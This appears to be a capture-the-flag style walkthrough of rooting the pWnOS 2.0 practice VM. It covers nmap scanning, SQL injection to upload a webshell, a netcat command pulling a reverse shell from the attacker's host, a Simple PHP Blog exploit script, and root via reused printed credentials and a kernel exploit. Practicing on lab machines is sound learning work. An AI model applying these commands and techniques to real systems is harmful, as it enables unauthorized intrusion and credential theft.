Rooting pWnOS 2.0 Walkthrough

Overview

pWnOS 2 is boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.

Lab Setup:

• VMWare workstation for Virtual Machines
• Kali Linux VM cutom network with subnet 10.10.10.1/24 range
• 0 VM custom network with subnet 10.10.10.1/24. Static IP address of pWnOS2.0 is 10.10.10.100

Kali Linux network settings

pwnOS network settings

Tools Used:

• Kali Linux VM
• Browser
• nc
• nmap
• burpsuite

Vulnerabilities Exploited:

• Sql Injection
• Shell upload with sql injection, database misconfiguration.
• System misconfiguration, reuse of root password.
• Linux Kernel 2.6.32 < 3.x (CentOS 5/6) – ‘PERF_EVENTS’ Local Privilege Escalation

Reconnaissance

Target VM IP Address: 10.10.10.100

Scanning

nmap

#nmap -p- -A -oX nmap-pwnOS2.xml –webxml 10.10.10.100

Nmap findings:

• Target OS is between Linux 2.6.32 – 2.6.39
• OpenSSH 5.8p1 is installed on port 22
• Apache httpd 2.2.17 is installed on port 80

Exploit path 1 for shell: SQL Injection

Lets explore website in browser.

Login page, lets check for sql injection.

See! we found sql injection. Also note down absolute path of website on server as ‘/var/www/login.php’. Using sql injecion, we can try uploading webshell using this disclosed local path.

Know time for burpsuite to exploit sql injection.

After database enumeration, we found:

database: ch16

table: users

columns for user table:user_id, first_name, last_name, email, pass, user_level, active

Lets crack hash for Dan, and gess what, i found cleartext password for given hash at hashkiller.co.uk. Cleartext password is killerbeesareflying.

Alfter logging in with admin@isints.com:killerbeesareflying there is nothing much we can do except seeing WAF warning message.

Lets analyse further to find another way. We can read local files. So, there is username dan on local machine.

Lets upload shell using sql injection

 

confirm, if webshell is uploaded successfully. Confirming in burpsuite.

Confirming shell is uploaded in browser.

 

Yes! webshell is uploaded successfully.

Next step to find a writable directory on server. After exploring i found /var/www/blog/config directory writable by www-data

Time to get interactive shell. Lets see, if nc is available on server.

nc is available.

lets upload php_reverse_shell.php by pentest monkey. You can find this webshell in kali linux /usr/share/webshells/php/php-reverse-shell.php

Configuring ip:port to kali linux attacking machine

Transfer reverse shell to target vm.

http://10.10.10.100/shell7.php?cmd=nc 10.10.10.128  8888 > /var/www/blog/config/rshell.php&

confirm rshell is uploaded

Listening for php-reverse-shell netcat shell

open rshell in browser to execute shell.

and we got shell

break jail shell

Exploit path 2 for Shell: Exploiting multiple vulnerabilities in Simple PHP Blog

Lets check for other directories on server with dirb.

#dirb http://10.10.10.100

With nikto, we found a directory “blog”

This is “Simple PHP Blog 0.4.0”

lets google for any available exploit for “Simple PHP Blog 0.4.0”

exploit link https://www.exploit-db.com/exploits/1191/

or use searchsploit to find exploit for simple php blog

Lets try Multiple Remote exploit

lets upload cmd.php

./sphpblog.pl -h http://10.10.10.100/blog -e 1

lets explore shell in browser

We can execute commands. Again, we can upload reverse shell in php and get interactive shell for nc as we did above. I am not going to repeat same. Lets go for pivileges escalation.

Privilege Escalation 1: Misconfiguration

we found db root username and password in mysqli_connect.php file at /var/ directory

root:root@ISIntS

lets reuse these credentials for secure shell

Congrats! We are root!

Privilege Escalation 2: Kernel exploit

lets check kernel version

there is perf_events exploit for this kernel that works.

I uploaded this exploit using nc. Know, lets try this exploit

Congrats! We are root!

Conclusion:

This is great Boot2Root VM. Rooting this VM i learned and enjoyed a lot.